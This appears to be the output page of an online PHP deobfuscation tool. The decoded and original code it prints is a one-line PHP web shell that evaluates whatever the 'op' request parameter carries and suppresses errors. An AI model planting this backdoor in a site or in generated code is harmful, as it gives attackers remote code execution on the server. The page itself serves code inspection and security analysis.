Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @eval($_REQUEST['op']); ?>..
Decoded Output download
<?php
@eval($_REQUEST['op']);
?>
Did this file decode correctly?
Original Code
<?php
@eval($_REQUEST['op']);
?>
Function Calls
None |
Stats
MD5 | 1d56eabec9fd18781c74707502bf3c91 |
Eval Count | 0 |
Decode Time | 109 ms |